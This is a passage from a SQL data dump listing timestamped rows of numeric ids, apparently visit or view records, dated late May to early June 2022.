12:31:10'),(52248,87,1,'2022-05-27','2022-05-27 12:32:07'),(52249,4700,1,'2022-05-27','2022-05-27 12:45:33'),(52250,68,1,'2022-05-27','2022-05-27 13:00:05'),(52251,80,1,'2022-05-27','2022-05-27 13:08:26'),(52252,3041,1,'2022-05-27','2022-05-27 13:14:13'),(52253,1718,1,'2022-05-27','2022-05-27 13:30:21'),(52254,3534,1,'2022-05-27','2022-05-27 14:16:25'),(52255,1608,1,'2022-05-27','2022-05-27 14:31:11'),(52256,80,1,'2022-05-27','2022-05-27 14:32:22'),(52257,1608,1,'2022-05-27','2022-05-27 14:32:47'),(52258,4566,1,'2022-05-27','2022-05-27 14:49:33'),(52259,3489,1,'2022-05-27','2022-05-27 15:15:20'),(52260,4582,1,'2022-05-27','2022-05-27 15:53:08'),(52261,1766,1,'2022-05-27','2022-05-27 17:46:50'),(52262,1766,1,'2022-05-27','2022-05-27 17:47:34'),(52263,1766,1,'2022-05-27','2022-05-27 17:48:51'),(52264,1766,1,'2022-05-27','2022-05-27 17:49:02'),(52265,1766,1,'2022-05-27','2022-05-27 17:49:19'),(52266,76,1,'2022-05-27','2022-05-27 17:50:16'),(52267,3030,1,'2022-05-27','2022-05-27 19:33:07'),(52268,1594,1,'2022-05-27','2022-05-27 20:50:18'),(52269,3271,1,'2022-05-27','2022-05-27 20:50:32'),(52270,1604,1,'2022-05-27','2022-05-27 21:00:43'),(52271,4645,1,'2022-05-27','2022-05-27 21:06:40'),(52272,4654,1,'2022-05-27','2022-05-27 21:14:11'),(52273,4657,1,'2022-05-27','2022-05-27 21:23:06'),(52274,4648,1,'2022-05-27','2022-05-27 21:29:40'),(52275,4660,1,'2022-05-27','2022-05-27 21:36:42'),(52276,108,1,'2022-05-27','2022-05-27 21:37:16'),(52277,4663,1,'2022-05-27','2022-05-27 21:44:14'),(52278,3285,1,'2022-05-27','2022-05-27 21:48:28'),(52279,3226,1,'2022-05-27','2022-05-27 22:04:25'),(52280,1582,1,'2022-05-27','2022-05-27 22:24:53'),(52281,1598,1,'2022-05-27','2022-05-27 22:51:02'),(52282,84,1,'2022-05-27','2022-05-27 22:57:52'),(52283,84,1,'2022-05-27','2022-05-27 23:01:01'),(52284,4566,1,'2022-05-27','2022-05-27 23:19:56'),(52285,3781,1,'2022-05-27','2022-05-27 23:51:41'),(52286,2503,1,'2022-05-28','2022-05-28 00:08:48'),(52287,2395,1,'2022-05-28','2022-05-28 00:49:49'),(52288,80,1,'2022-05-28','2022-05-28 01:23:39'),(52289,1606,1,'2022-05-28','2022-05-28 01:57:30'),(52290,1877,1,'2022-05-28','2022-05-28 01:59:08'),(52291,3109,1,'2022-05-28','2022-05-28 02:34:00'),(52292,1734,1,'2022-05-28','2022-05-28 02:43:01'),(52293,1728,1,'2022-05-28','2022-05-28 02:43:18'),(52294,1728,1,'2022-05-28','2022-05-28 02:43:25'),(52295,1728,1,'2022-05-28','2022-05-28 02:43:33'),(52296,1586,1,'2022-05-28','2022-05-28 02:59:41'),(52297,1600,1,'2022-05-28','2022-05-28 03:12:20'),(52298,4238,1,'2022-05-28','2022-05-28 03:57:13'),(52299,4238,1,'2022-05-28','2022-05-28 06:32:06'),(52300,3226,1,'2022-05-28','2022-05-28 07:16:36'),(52301,2769,1,'2022-05-28','2022-05-28 07:30:23'),(52302,4412,1,'2022-05-28','2022-05-28 07:57:24'),(52303,3691,1,'2022-05-28','2022-05-28 09:35:07'),(52304,2989,1,'2022-05-28','2022-05-28 10:14:49'),(52305,2769,1,'2022-05-28','2022-05-28 11:03:22'),(52306,4703,1,'2022-05-28','2022-05-28 12:37:20'),(52307,68,1,'2022-05-28','2022-05-28 12:43:47'),(52308,74,1,'2022-05-28','2022-05-28 12:47:07'),(52309,74,1,'2022-05-28','2022-05-28 12:52:11'),(52310,74,1,'2022-05-28','2022-05-28 12:53:39'),(52311,74,1,'2022-05-28','2022-05-28 12:54:39'),(52312,3030,1,'2022-05-28','2022-05-28 13:14:35'),(52313,3030,1,'2022-05-28','2022-05-28 13:21:00'),(52314,477,1,'2022-05-28','2022-05-28 13:36:08'),(52315,4238,1,'2022-05-28','2022-05-28 15:52:37'),(52316,4412,1,'2022-05-28','2022-05-28 16:39:45'),(52317,1588,1,'2022-05-28','2022-05-28 17:20:28'),(52318,4520,1,'2022-05-28','2022-05-28 17:54:03'),(52319,87,1,'2022-05-28','2022-05-28 19:59:09'),(52320,1722,1,'2022-05-28','2022-05-28 20:59:35'),(52321,3069,1,'2022-05-28','2022-05-28 21:03:59'),(52322,1582,1,'2022-05-28','2022-05-28 21:49:55'),(52323,1703,1,'2022-05-28','2022-05-28 21:59:50'),(52324,1703,1,'2022-05-28','2022-05-28 22:44:54'),(52325,2309,1,'2022-05-29','2022-05-29 00:49:33'),(52326,87,1,'2022-05-29','2022-05-29 00:53:04'),(52327,4238,1,'2022-05-29','2022-05-29 01:04:30'),(52328,4496,1,'2022-05-29','2022-05-29 01:36:05'),(52329,1722,1,'2022-05-29','2022-05-29 01:50:26'),(52330,72,1,'2022-05-29','2022-05-29 02:20:17'),(52331,1598,1,'2022-05-29','2022-05-29 02:34:26'),(52332,4587,1,'2022-05-29','2022-05-29 06:53:50'),(52333,1602,1,'2022-05-29','2022-05-29 09:26:30'),(52334,1608,1,'2022-05-29','2022-05-29 11:00:26'),(52335,4238,1,'2022-05-29','2022-05-29 11:13:09'),(52336,1594,1,'2022-05-29','2022-05-29 11:39:09'),(52337,72,1,'2022-05-29','2022-05-29 12:57:03'),(52338,2159,1,'2022-05-29','2022-05-29 13:03:27'),(52339,3083,1,'2022-05-29','2022-05-29 13:24:22'),(52340,2904,1,'2022-05-29','2022-05-29 14:18:24'),(52341,1701,1,'2022-05-29','2022-05-29 14:20:01'),(52342,1730,1,'2022-05-29','2022-05-29 14:21:36'),(52343,468,1,'2022-05-29','2022-05-29 14:27:36'),(52344,4520,1,'2022-05-29','2022-05-29 15:31:12'),(52345,1596,1,'2022-05-29','2022-05-29 15:54:49'),(52346,2161,1,'2022-05-29','2022-05-29 17:00:53'),(52347,2420,1,'2022-05-29','2022-05-29 17:04:46'),(52348,1602,1,'2022-05-29','2022-05-29 17:27:28'),(52349,1596,1,'2022-05-29','2022-05-29 17:28:57'),(52350,1588,1,'2022-05-29','2022-05-29 18:10:51'),(52351,2420,1,'2022-05-29','2022-05-29 18:33:42'),(52352,3072,1,'2022-05-29','2022-05-29 18:50:27'),(52353,467,1,'2022-05-29','2022-05-29 19:04:14'),(52354,4238,1,'2022-05-29','2022-05-29 19:40:51'),(52355,3117,1,'2022-05-29','2022-05-29 19:45:16'),(52356,1612,1,'2022-05-29','2022-05-29 20:53:44'),(52357,472,1,'2022-05-29','2022-05-29 21:29:04'),(52358,1592,1,'2022-05-29','2022-05-29 21:50:06'),(52359,2159,1,'2022-05-29','2022-05-29 21:51:05'),(52360,1608,1,'2022-05-29','2022-05-29 21:51:07'),(52361,1745,1,'2022-05-29','2022-05-29 21:51:08'),(52362,2159,1,'2022-05-29','2022-05-29 22:06:10'),(52363,4391,1,'2022-05-29','2022-05-29 22:12:06'),(52364,3777,1,'2022-05-29','2022-05-29 22:47:20'),(52365,1602,1,'2022-05-29','2022-05-29 22:57:01'),(52366,1582,1,'2022-05-29','2022-05-29 23:11:59'),(52367,4420,1,'2022-05-30','2022-05-30 00:17:15'),(52368,570,1,'2022-05-30','2022-05-30 00:50:11'),(52369,3764,1,'2022-05-30','2022-05-30 01:05:46'),(52370,1588,1,'2022-05-30','2022-05-30 01:47:16'),(52371,4424,1,'2022-05-30','2022-05-30 02:02:17'),(52372,4387,1,'2022-05-30','2022-05-30 03:05:27'),(52373,570,1,'2022-05-30','2022-05-30 03:53:06'),(52374,2410,1,'2022-05-30','2022-05-30 04:02:46'),(52375,3069,1,'2022-05-30','2022-05-30 05:00:27'),(52376,3030,1,'2022-05-30','2022-05-30 05:45:43'),(52377,3092,1,'2022-05-30','2022-05-30 06:15:38'),(52378,1602,1,'2022-05-30','2022-05-30 06:16:50'),(52379,1586,1,'2022-05-30','2022-05-30 06:30:26'),(52380,3053,1,'2022-05-30','2022-05-30 07:00:10'),(52381,1598,1,'2022-05-30','2022-05-30 07:49:21'),(52382,68,1,'2022-05-30','2022-05-30 08:28:59'),(52383,1598,1,'2022-05-30','2022-05-30 10:16:03'),(52384,1598,1,'2022-05-30','2022-05-30 10:52:15'),(52385,4457,1,'2022-05-30','2022-05-30 11:27:25'),(52386,68,1,'2022-05-30','2022-05-30 11:58:56'),(52387,72,1,'2022-05-30','2022-05-30 11:59:07'),(52388,76,1,'2022-05-30','2022-05-30 12:03:15'),(52389,1604,1,'2022-05-30','2022-05-30 12:05:33'),(52390,1747,1,'2022-05-30','2022-05-30 12:19:39'),(52391,72,1,'2022-05-30','2022-05-30 12:33:52'),(52392,4719,1,'2022-05-30','2022-05-30 12:34:22'),(52393,72,1,'2022-05-30','2022-05-30 12:39:42'),(52394,4719,1,'2022-05-30','2022-05-30 12:45:08'),(52395,4719,1,'2022-05-30','2022-05-30 12:59:05'),(52396,4719,1,'2022-05-30','2022-05-30 13:21:45'),(52397,4719,1,'2022-05-30','2022-05-30 13:44:03'),(52398,91,1,'2022-05-30','2022-05-30 13:49:27'),(52399,4719,1,'2022-05-30','2022-05-30 13:49:39'),(52400,4238,1,'2022-05-30','2022-05-30 13:50:55'),(52401,3498,1,'2022-05-30','2022-05-30 14:33:38'),(52402,68,1,'2022-05-30','2022-05-30 14:38:43'),(52403,3752,1,'2022-05-30','2022-05-30 14:54:23'),(52404,2989,1,'2022-05-30','2022-05-30 15:10:23'),(52405,4612,1,'2022-05-30','2022-05-30 15:22:05'),(52406,2971,1,'2022-05-30','2022-05-30 15:44:20'),(52407,469,1,'2022-05-30','2022-05-30 16:51:58'),(52408,1582,1,'2022-05-30','2022-05-30 16:57:54'),(52409,2956,1,'2022-05-30','2022-05-30 18:26:52'),(52410,3482,1,'2022-05-30','2022-05-30 18:26:54'),(52411,3438,1,'2022-05-30','2022-05-30 18:26:54'),(52412,3742,1,'2022-05-30','2022-05-30 18:26:56'),(52413,3498,1,'2022-05-30','2022-05-30 18:26:57'),(52414,3430,1,'2022-05-30','2022-05-30 18:26:57'),(52415,570,1,'2022-05-30','2022-05-30 18:39:21'),(52416,570,1,'2022-05-30','2022-05-30 18:39:36'),(52417,570,1,'2022-05-30','2022-05-30 18:39:51'),(52418,0,1,'2022-05-30','2022-05-30 19:31:29'),(52419,0,1,'2022-05-30','2022-05-30 19:31:58'),(52420,0,1,'2022-05-30','2022-05-30 19:33:58'),(52421,0,1,'2022-05-30','2022-05-30 19:38:29'),(52422,0,1,'2022-05-30','2022-05-30 19:38:48'),(52423,84,1,'2022-05-30','2022-05-30 19:38:58'),(52424,1592,1,'2022-05-30','2022-05-30 19:42:51'),(52425,4420,1,'2022-05-30','2022-05-30 19:58:06'),(52426,570,1,'2022-05-30','2022-05-30 20:16:45'),(52427,1582,1,'2022-05-30','2022-05-30 20:57:27'),(52428,1596,1,'2022-05-30','2022-05-30 21:56:13'),(52429,1766,1,'2022-05-30','2022-05-30 23:42:38'),(52430,3498,1,'2022-05-30','2022-05-30 23:42:45'),(52431,1608,1,'2022-05-30','2022-05-30 23:42:59'),(52432,1766,1,'2022-05-30','2022-05-30 23:43:03'),(52433,1766,1,'2022-05-30','2022-05-30 23:44:04'),(52434,1604,1,'2022-05-31','2022-05-31 01:26:29'),(52435,2809,1,'2022-05-31','2022-05-31 02:59:21'),(52436,469,1,'2022-05-31','2022-05-31 03:29:19'),(52437,472,1,'2022-05-31','2022-05-31 03:32:47'),(52438,72,1,'2022-05-31','2022-05-31 03:55:26'),(52439,4618,1,'2022-05-31','2022-05-31 03:55:55'),(52440,4717,1,'2022-05-31','2022-05-31 03:56:00'),(52441,4717,1,'2022-05-31','2022-05-31 03:56:05'),(52442,72,1,'2022-05-31','2022-05-31 03:56:19'),(52443,4729,1,'2022-05-31','2022-05-31 03:56:23'),(52444,4729,1,'2022-05-31','2022-05-31 03:56:26'),(52445,4719,1,'2022-05-31','2022-05-31 03:56:28'),(52446,4573,1,'2022-05-31','2022-05-31 03:56:30'),(52447,4569,1,'2022-05-31','2022-05-31 03:57:22'),(52448,4733,1,'2022-05-31','2022-05-31 03:57:45'),(52449,1598,1,'2022-05-31','2022-05-31 03:59:16'),(52450,4576,1,'2022-05-31','2022-05-31 04:03:24'),(52451,4642,1,'2022-05-31','2022-05-31 04:04:18'),(52452,4642,1,'2022-05-31','2022-05-31 04:06:12'),(52453,1606,1,'2022-05-31','2022-05-31 05:29:16'),(52454,1600,1,'2022-05-31','2022-05-31 05:57:05'),(52455,1600,1,'2022-05-31','2022-05-31 06:00:02'),(52456,1596,1,'2022-05-31','2022-05-31 07:34:49'),(52457,472,1,'2022-05-31','2022-05-31 07:44:21'),(52458,1728,1,'2022-05-31','2022-05-31 12:00:59'),(52459,72,1,'2022-05-31','2022-05-31 12:19:05'),(52460,3479,1,'2022-05-31','2022-05-31 13:43:37'),(52461,2165,1,'2022-05-31','2022-05-31 14:28:02'),(52462,3781,1,'2022-05-31','2022-05-31 15:12:51'),(52463,1582,1,'2022-05-31','2022-05-31 15:27:54'),(52464,1582,1,'2022-05-31','2022-05-31 15:29:37'),(52465,80,1,'2022-05-31','2022-05-31 15:32:29'),(52466,472,1,'2022-05-31','2022-05-31 16:42:41'),(52467,2775,1,'2022-05-31','2022-05-31 17:13:52'),(52468,4663,1,'2022-05-31','2022-05-31 18:57:44'),(52469,72,1,'2022-05-31','2022-05-31 19:26:15'),(52470,570,1,'2022-05-31','2022-05-31 19:51:46'),(52471,1602,1,'2022-05-31','2022-05-31 21:14:17'),(52472,1699,1,'2022-05-31','2022-05-31 22:27:42'),(52473,1703,1,'2022-06-01','2022-06-01 00:11:07'),(52474,2309,1,'2022-06-01','2022-06-01 00:29:07'),(52475,3438,1,'2022-06-01','2022-06-01 01:40:36'),(52476,2457,1,'2022-06-01','2022-06-01 02:09:50'),(52477,72,1,'2022-06-01','2022-06-01 02:29:09'),(52478,2152,1,'2022-06-01','2022-06-01 03:38:47'),(52479,472,1,'2022-06-01','2022-06-01 04:03:34'),(52480,1774,1,'2022-06-01','2022-06-01 04:16:40'),(52481,1602,1,'2022-06-01','2022-06-01 05:17:48'),(52482,4520,1,'2022-06-01','2022-06-01 06:47:11'),(52483,3781,1,'2022-06-01','2022-06-01 07:36:13'),(52484,68,1,'2022-06-01','2022-06-01 09:41:04'),(52485,68,1,'2022-06-01','2022-06-01 09:42:59'),(52486,91,1,'2022-06-01','2022-06-01 09:43:09'),(52487,2751,1,'2022-06-01','2022-06-01 09:53:17'),(52488,2751,1,'2022-06-01','2022-06-01 09:53:26'),(52489,2751,1,'2022-06-01','2022-06-01 09:58:27'),(52490,72,1,'2022-06-01','2022-06-01 10:10:46'),(52491,2991,1,'2022-06-01','2022-06-01 11:16:57'),(52492,4576,1,'2022-06-01','2022-06-01 11:55:56'),(52493,3764,1,'2022-06-01','2022-06-01 12:53:35'),(52494,4717,1,'2022-06-01','2022-06-01 12:54:38'),(52495,479,1,'2022-06-01','2022-06-01 13:40:46'),(52496,4457,1,'2022-06-01','2022-06-01 13:46:00'),(52497,91,1,'2022-06-01','2022-06-01 14:09:13'),(52498,480,1,'2022-06-01','2022-06-01 15:10:50'),(52499,1602,1,'2022-06-01','2022-06-01 15:29:37'),(52500,1586,1,'2022-06-01','2022-06-01 15:48:54'),(52501,1586,1,'2022-06-01','2022-06-01 16:38:24'),(52502,1724,1,'2022-06-01','2022-06-01 16:42:44'),(52503,1724,1,'2022-06-01','2022-06-01 16:43:12'),(52504,1724,1,'2022-06-01','2022-06-01 16:44:48'),(52505,476,1,'2022-06-01','2022-06-01 16:47:56'),(52506,3438,1,'2022-06-01','2022-06-01 17:26:40'),(52507,3083,1,'2022-06-01','2022-06-01 17:51:44'),(52508,72,1,'2022-06-01','2022-06-01 18:41:42'),(52509,474,1,'2022-06-01','2022-06-01 18:43:06'),(52510,1598,1,'2022-06-01','2022-06-01 19:04:04'),(52511,1598,1,'2022-06-01','2022-06-01 19:04:07'),(52512,1598,1,'2022-06-01','2022-06-01 19:04:08'),(52513,1770,1,'2022-06-01','2022-06-01 19:43:17'),(52514,4622,1,'2022-06-01','2022-06-01 20:42:24'),(52515,1724,1,'2022-06-01','2022-06-01 20:59:52'),(52516,1612,1,'2022-06-01','2022-06-01 21:15:33'),(52517,4657,1,'2022-06-01','2022-06-01 21:26:05'),(52518,1588,1,'2022-06-01','2022-06-01 21:57:44'),(52519,2617,1,'2022-06-01','2022-06-01 22:18:43'),(52520,2159,1,'2022-06-01','2022-06-01 22:20:55'),(52521,2410,1,'2022-06-01','2022-06-01 22:41:12'),(52522,2804,1,'2022-06-01','2022-06-01 23:36:55'),(52523,2904,1,'2022-06-02','2022-06-02 00:03:36'),(52524,3307,1,'2022-06-02','2022-06-02 00:03:40'),(52525,3791,1,'2022-06-02','2022-06-02 00:04:10'),(52526,1610,1,'2022-06-02','2022-06-02 00:10:39'),(52527,1743,1,'2022-06-02','2022-06-02 00:41:19'),(52528,1600,1,'2022-06-02','2022-06-02 00:43:31'),(52529,3124,1,'2022-06-02','2022-06-02 00:45:20'),(52530,1600,1,'2022-06-02','2022-06-02 00:46:44'),(52531,3280,1,'2022-06-02','2022-06-02 00:48:35'),(52532,1872,1,'2022-06-02','2022-06-02 00:55:22'),(52533,2769,1,'2022-06-02','2022-06-02 00:57:47'),(52534,4508,1,'2022-06-02','2022-06-02 01:02:50'),(52535,80,1,'2022-06-02','2022-06-02 01:06:50'),(52536,4457,1,'2022-06-02','2022-06-02 01:15:51'),(52537,3724,1,'2022-06-02','2022-06-02 01:23:00'),(52538,1739,1,'2022-06-02','2022-06-02 01:27:24'),(52539,4391,1,'2022-06-02','2022-06-02 01:32:05'),(52540,4576,1,'2022-06-02','2022-06-02 01:40:12'),(52541,3764,1,'2022-06-02','2022-06-02 01:42:40'),(52542,3764,1,'2022-06-02','2022-06-02 01:43:00'),(52543,1602,1,'2022-06-02','2022-06-02 01:55:01'),(52544,485,1,'2022-06-02','2022-06-02 02:09:02'),(52545,3706,1,'2022-06-02','2022-06-02 02:17:36'),(52546,476,1,'2022-06-02','2022-06-02 02:21:28'),(52547,2309,1,'2022-06-02','2022-06-02 05:01:47'),(52548,4622,1,'2022-06-02','2022-06-02 05:34:22'),(52549,80,1,'2022-06-02','2022-06-02 05:45:15'),(52550,1606,1,'2022-06-02','2022-06-02 06:36:45'),(52551,72,1,'2022-06-02','2022-06-02 10:54:10'),(52552,1600,1,'2022-06-02','2022-06-02 11:20:51'),(52553,80,1,'2022-06-02','2022-06-02 12:04:07'),(52554,467,1,'2022-06-02','2022-06-02 12:14:50'),(52555,1582,1,'2022-06-02','2022-06-02 12:24:36'),(52556,1582,1,'2022-06-02','2022-06-02 12:29:41'),(52557,91,1,'2022-06-02','2022-06-02 13:09:47'),(52558,4576,1,'2022-06-02','2022-06-02 13:20:50'),(52559,1544,1,'2022-06-02','2022-06-02 13:44:50'),(52560,2991,1,'2022-06-02','2022-06-02 13:54:07'),(52561,4622,1,'2022-06-02','2022-06-02 14:04:22'),(52562,488,1,'2022-06-02','2022-06-02 14:12:59'),(52563,4660,1,'2022-06-02','2022-06-02 14:46:19'),(52564,3691,1,'2022-06-02','2022-06-02 14:48:47'),(52565,87,1,'2022-06-02','2022-06-02 15:06:59'),(52566,2297,1,'2022-06-02','2022-06-02 16:44:24'),(52567,72,1,'2022-06-02','2022-06-02 19:13:10'),(52568,80,1,'2022-06-02','2022-06-02 20:49:37'),(52569,1600,1,'2022-06-02','2022-06-02 21:02:41'),(52570,80,1,'2022-06-02','2022-06-02 21:29:06'),(52571,4722,1,'2022-06-02','2022-06-02 22:08:05'),(52572,3664,1,'2022-06-02','2022-06-02 22:15:06'),(52573,1582,1,'2022-06-02','2022-06-02 22:56:57'),(52574,4733,1,'2022-06-02','2022-06-02 23:21:28'),(52575,1766,1,'2022-06-02','2022-06-02 23:45:52'),(52576,4733,1,'2022-06-03','2022-06-03 00:29:50'),(52577,1711,1,'2022-06-03','2022-06-03 00:53:58'),(52578,2617,1,'2022-06-03','2022-06-03 01:53:27'),(52579,3771,1,'2022-06-03','2022-06-03 02:53:07'),(52580,72,1,'2022-06-03','2022-06-03 03:32:00'),(52581,4363,1,'2022-06-03','2022-06-03 03:44:09'),(52582,4663,1,'2022-06-03','2022-06-03 06:41:09'),(52583,80,1,'2022-06-03','2022-06-03 07:17:38'),(52584,3313,1,'2022-06-03','2022-06-03 07:54:06'),(52585,2971,1,'2022-06-03','2022-06-03 08:12:05'),(52586,80,1,'2022-06-03','2022-06-03 08:31:17'),(52587,1776,1,'2022-06-03','2022-06-03 08:32:23'),(52588,484,1,'2022-06-03','2022-06-03 09:10:18'),(52589,91,1,'2022-06-03','2022-06-03 09:54:23'),(52590,1872,1,'2022-06-03','2022-06-03 09:55:38'),(52591,2152,1,'2022-06-03','2022-06-03 09:55:47'),(52592,1722,1,'2022-06-03','2022-06-03 09:58:39'),(52593,2152,1,'2022-06-03','2022-06-03 10:00:16'),(52594,2152,1,'2022-06-03','2022-06-03 10:00:30'),(52595,1722,1,'2022-06-03','2022-06-03 10:01:08'),(52596,1877,1,'2022-06-03','2022-06-03 11:11:11'),(52597,1778,1,'2022-06-03','2022-06-03 11:19:36'),(52598,72,1,'2022-06-03','2022-06-03 11:37:08'),(52599,3083,1,'2022-06-03','2022-06-03 12:13:39'),(52600,4323,1,'2022-06-03','2022-06-03 12:25:20'),(52601,3752,1,'2022-06-03','2022-06-03 12:25:52'),(52602,1772,1,'2022-06-03','2022-06-03 12:52:18'),(52603,4573,1,'2022-06-03','2022-06-03 12:52:51'),(52604,4587,1,'2022-06-03','2022-06-03 14:50:20'),(52605,1592,1,'2022-06-03','2022-06-03 15:41:07'),(52606,3313,1,'2022-06-03','2022-06-03 15:56:12'),(52607,80,1,'2022-06-03','2022-06-03 16:11:06'),(52608,570,1,'2022-06-03','2022-06-03 17:11:07'),(52609,3707,1,'2022-06-03','2022-06-03 17:17:12'),(52610,3090,1,'2022-06-03','2022-06-03 17:47:13'),(52611,1728,1,'2022-06-03','2022-06-03 18:17:12'),(52612,1582,1,'2022-06-03','2022-06-03 19:18:26'),(52613,72,1,'2022-06-03','2022-06-03 20:38:47'),(52614,1582,1,'2022-06-03','2022-06-03 21:13:08'),(52615,3752,1,'2022-06-03','2022-06-03 23:15:08'),(52616,2420,1,'2022-06-03','2022-06-03 23:22:05'),(52617,486,1,'2022-06-03','2022-06-03 23:52:42'),(52618,486,1,'2022-06-03','2022-06-03 23:54:02'),(52619,3731,1,'2022-06-04','2022-06-04 00:48:11'),(52620,1592,1,'2022-06-04','2022-06-04 01:29:07'),(52621,80,1,'2022-06-04','2022-06-04 01:34:57'),(52622,3280,1,'2022-06-04','2022-06-04 01:52:56'),(52623,1728,1,'2022-06-04','2022-06-04 02:11:09'),(52624,570,1,'2022-06-04','2022-06-04 02:14:06'),(52625,3278,1,'2022-06-04','2022-06-04 02:43:42'),(52626,2991,1,'2022-06-04','2022-06-04 02:58:49'),(52627,570,1,'2022-06-04','2022-06-04 02:59:05'),(52628,2248,1,'2022-06-04','2022-06-04 02:59:07'),(52629,68,1,'2022-06-04','2022-06-04 03:17:10'),(52630,1870,1,'2022-06-04','2022-06-04 03:21:58'),(52631,1586,1,'2022-06-04','2022-06-04 04:14:45'),(52632,72,1,'2022-06-04','2022-06-04 04:20:29'),(52633,2178,1,'2022-06-04','2022-06-04 04:23:23'),(52634,2297,1,'2022-06-04','2022-06-04 05:59:13'),(52635,3742,1,'2022-06-04','2022-06-04 05:59:19'),(52636,3781,1,'2022-06-04','2022-06-04 06:13:39'),(52637,4436,1,'2022-06-04','2022-06-04 06:19:34'),(52638,3789,1,'2022-06-04','2022-06-04 06:48:12'),(52639,4510,1,'2022-06-04','2022-06-04 06:56:30'),(52640,2296,1,'2022-06-04','2022-06-04 07:21:05'),(52641,4668,1,'2022-06-04','2022-06-04 07:29:06'),(52642,473,1,'2022-06-04','2022-06-04 08:59:11'),(52643,1877,1,'2022-06-04','2022-06-04 09:22:07'),(52644,4436,1,'2022-06-04','2022-06-04 09:41:42'),(52645,2617,1,'2022-06-04','2022-06-04 10:04:11'),(52646,2148,1,'2022-06-04','2022-06-04 10:07:10'),(52647,472,1,'2022-06-04','2022-06-04 10:26:44'),(52648,2813,1,'2022-06-04','2022-06-04 10:44:49'),(52649,1592,1,'2022-06-04','2022-06-04 10:44:53'),(52650,4622,1,'2022-06-04','2022-06-04 10:59:05'),(52651,80,1,'2022-06-04','2022-06-04 11:20:59'),(52652,68,1,'2022-06-04','2022-06-04 11:59:14'),(52653,485,1,'2022-06-04','2022-06-04 12:37:26'),(52654,3072,1,'2022-06-04','2022-06-04 12:44:16'),(52655,72,1,'2022-06-04','2022-06-04 12:45:50'),(52656,1724,1,'2022-06-04','2022-06-04 13:02:48'),(52657,68,1,'2022-06-04','2022-06-04 13:29:20'),(52658,1586,1,'2022-06-04','2022-06-04 13:57:43'),(52659,4341,1,'2022-06-04','2022-06-04 14:38:25'),(52660,76,1,'2022-06-04','2022-06-04 14:42:59'),(52661,4719,1,'2022-06-04','2022-06-04 14:51:39'),(52662,91,1,'2022-06-04','2022-06-04 14:59:26'),(52663,4591,1,'2022-06-04','2022-06-04 15:08:17'),(52664,4587,1,'2022-06-04','2022-06-04 15:08:17'),(52665,4396,1,'2022-06-04','2022-06-04 15:13:31'),(52666,4396,1,'2022-06-04','2022-06-04 15:22:13'),(52667,4542,1,'2022-06-04','2022-06-04 15:23:28'),(52668,4444,1,'2022-06-04','2022-06-04 15:23:54'),(52669,4444,1,'2022-06-04','2022-06-04 15:24:35'),(52670,2297,1,'2022-06-04','2022-06-04 15:35:57'),(52671,4520,1,'2022-06-04','2022-06-04 16:21:01'),(52672,2297,1,'2022-06-04','2022-06-04 16:21:21'),(52673,1592,1,'2022-06-04','2022-06-04 17:49:43'),(52674,1602,1,'2022-06-04','2022-06-04 17:54:25'),(52675,1594,1,'2022-06-04','2022-06-04 18:14:12'),(52676,1610,1,'2022-06-04','2022-06-04 18:14:53'),(52677,1610,1,'2022-06-04','2022-06-04 18:14:55'),(52678,80,1,'2022-06-04','2022-06-04 19:21:32'),(52679,3030,1,'2022-06-04','2022-06-04 19:39:10'),(52680,72,1,'2022-06-04','2022-06-04 20:40:06'),(52681,2813,1,'2022-06-04','2022-06-04 20:48:08'),(52682,4436,1,'2022-06-04','2022-06-04 21:03:39'),(52683,3253,1,'2022-06-04','2022-06-04 21:33:12'),(52684,3072,1,'2022-06-04','2022-06-04 21:34:07'),(52685,4576,1,'2022-06-04','2022-06-04 21:56:13'),(52686,1768,1,'2022-06-04','2022-06-04 22:27:44'),(52687,481,1,'2022-06-04','2022-06-04 23:31:29'),(52688,4520,1,'2022-06-05','2022-06-05 01:01:53'),(52689,4412,1,'2022-06-05','2022-06-05 01:46:52'),(52690,2775,1,'2022-06-05','2022-06-05 02:09:23'),(52691,2309,1,'2022-06-05','2022-06-05 02:31:59'),(52692,4335,1,'2022-06-05','2022-06-05 03:16:54'),(52693,1614,1,'2022-06-05','2022-06-05 04:01:56'),(52694,72,1,'2022-06-05','2022-06-05 04:32:18'),(52695,108,1,'2022-06-05','2022-06-05 04:45:16'),(52696,68,1,'2022-06-05','2022-06-05 05:48:36'),(52697,91,1,'2022-06-05','2022-06-05 05:54:28'),(52698,68,1,'2022-06-05','2022-06-05 06:33:12'),(52699,3764,1,'2022-06-05','2022-06-05 08:49:41'),(52700,4520,1,'2022-06-05','2022-06-05 09:46:43'),(52701,2775,1,'2022-06-05','2022-06-05 10:00:59'),(52702,3430,1,'2022-06-05','2022-06-05 10:45:26'),(52703,4706,1,'2022-06-05','2022-06-05 10:49:28'),(52704,3045,1,'2022-06-05','2022-06-05 11:00:27'),(52705,477,1,'2022-06-05','2022-06-05 11:10:05'),(52706,2178,1,'2022-06-05','2022-06-05 11:29:56'),(52707,1594,1,'2022-06-05','2022-06-05 11:45:24'),(52708,4706,1,'2022-06-05','2022-06-05 12:30:13'),(52709,72,1,'2022-06-05','2022-06-05 13:02:37'),(52710,4691,1,'2022-06-05','2022-06-05 13:15:26'),(52711,1614,1,'2022-06-05','2022-06-05 15:07:56'),(52712,3691,1,'2022-06-05','2022-06-05 16:06:25'),(52713,4520,1,'2022-06-05','2022-06-05 17:45:24'),(52714,3313,1,'2022-06-05','2022-06-05 18:06:40'),(52715,4408,1,'2022-06-05','2022-06-05 19:07:17'),(52716,488,1,'2022-06-05','2022-06-05 19:07:25'),(52717,1695,1,'2022-06-05','2022-06-05 19:08:48'),(52718,3045,1,'2022-06-05','2022-06-05 19:46:26'),(52719,4608,1,'2022-06-05','2022-06-05 20:40:22'),(52720,467,1,'2022-06-05','2022-06-05 20:49:00'),(52721,1608,1,'2022-06-05','2022-06-05 21:34:24'),(52722,4485,1,'2022-06-05','2022-06-05 21:34:31'),(52723,471,1,'2022-06-05','2022-06-05 21:34:35'),(52724,4691,1,'2022-06-05','2022-06-05 21:36:46'),(52725,2152,1,'2022-06-05','2022-06-05 22:01:59'),(52726,2152,1,'2022-06-05','2022-06-05 22:02:25'),(52727,2152,1,'2022-06-05','2022-06-05 22:02:42'),(52728,2152,1,'2022-06-05','2022-06-05 22:02:53'),(52729,3430,1,'2022-06-05','2022-06-05 22:06:30'),(52730,72,1,'2022-06-05','2022-06-05 22:17:06'),(52731,4457,1,'2022-06-05','2022-06-05 22:38:22'),(52732,1582,1,'2022-06-05','2022-06-05 22:45:34'),(52733,3102,1,'2022-06-05','2022-06-05 22:49:59'),(52734,1594,1,'2022-06-05','2022-06-05 